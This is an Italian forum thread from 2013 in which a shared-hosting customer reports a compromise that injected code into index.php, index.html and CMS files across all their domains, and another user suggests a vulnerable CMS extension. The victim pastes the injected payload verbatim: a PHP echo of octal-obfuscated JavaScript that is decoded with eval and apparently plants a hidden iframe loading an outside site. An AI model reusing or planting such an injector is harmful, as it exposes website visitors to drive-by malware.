Annuncio

**Sean** · 19-05-2013, 10:53:55

Spostiamo in Super Digital...la sezione Home Unix è ormai fuori uso.

**Belch Warrior** · 28-05-2013, 11:23:19

che ne pensi dei ripetuti attacchi code injection sui server apache linux di questi ultimi giorni? Soluzioni? Protezioni?

**lucrus** · 29-05-2013, 09:09:10

Non mi risulta siano stati riportati picchi di code injection negli ultimi giorni sui server Apache, l'ultimo di cui sapevo era di dicembre 2012. Hai il link ad un blog che ne parli?

**Belch Warrior** · 30-05-2013, 09:39:37

sono entrati il 25 maggio sul mio hosting su cui ho diversi domini...

hanno aggiunto un pezzo di codice su tutti i file index.html sui siti html, index.php sugli altri, e dove c'erano cms hanno fatto i danni maggiori, sui wordpress hanno toccato solo index.php, sui jooml hanno toccato index.php e hanno aggiunto un file php, mentre sui prestashop hano fatto molto casino, toccando moltissimi php e .js

**lucrus** · 31-05-2013, 08:38:15

Più che un problema di Apache, è più probabile che abbiano sfruttato una falla di qualche estensione dei CMS. A seconda di quanto è grave la falla, potrebbero anche averne usata una sola per fare i danni a quel CMS e attraverso quella anche a tutti gli altri.
Come sei messo ad aggiornamenti di sicurezza? Che distro usi? Dal server è possibile navigare? I vari CMS hanno molte estensioni? Sono aggiornate? Hai accesso di root al server o solo FTP?

**Belch Warrior** · 31-05-2013, 12:14:34

e' un hosting condiviso... nel senso che quello che io vedo come "root" in realta' consente l'accesso ai miei domini, ma non alla root vera del server, ed ogni sottodirectory corrisponde ad un dominio...

la falla comunque non si e' capito a cosa sia dovuta, perche' hanno toccato tutti i domini, hanno aggiunto del codice javascript criptato in base64...

questo qua:

#bf760a#
echo " <script type=\"text/javascript\" language=\"javascript\" > asd=function(){d.body++};a=(\"44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44 ,177,21,16,44,172,145,166,44,153,157,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,17 0,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,153,157,62,1 67,166,147,44,101,44,53,154,170,170,164,76,63,63,150,155,161,163,162,151,175,62,166,171,63,147,162,1 70,62,164,154,164,53,77,21,16,44,153,157,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,4 4,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,153,157,62,167,170,175,160,151,62,146,163 ,166,150,151,166,44,101,44,53,64,53,77,21,16,44,153,157,62,167,170,175,160,151,62,154,151,155,153,15 4,170,44,101,44,53,65,164,174,53,77,21,16,44,153,157,62,167,170,175,160,151,62,173,155,150,170,154,4 4,101,44,53,65,164,174,53,77,21,16,44,153,157,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53 ,65,164,174,53,77,21,16,44,153,157,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53, 77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,15 1,162,170,106,175,115,150,54,53,153,157,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62, 173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,153,157,140,53,102,100,63,150,155,17 2,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,1 06,175,115,150,54,53,153,157,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,153,157,55,77,2 1,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,5 4,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110, 145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,1 51,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151 ,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160, 44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,16 4,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,5 4,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,16 1,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101 ,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,7 7,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170 ,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,4 4,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113, 151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,1 45,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,1 74,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44, 101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16, 44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45 ,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,16 2,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16 ,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145 ,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145 ,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162, 150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150, 44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,15 7,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145, 164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166, 155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145 ,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21, 16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,5 5,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167 ,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,17 6,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16\"[\"split\"](\",\"));ss=eval(\"S\"+\"tr\"+\"ing\");d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window[\"document\"])eval(ss.fromCharCode.apply(ss,a));</script>";

#/bf760a#

Annuncio

Chiedete a me!

Chiedete a me!

Commenta

Commenta

Commenta

Commenta

Commenta

Commenta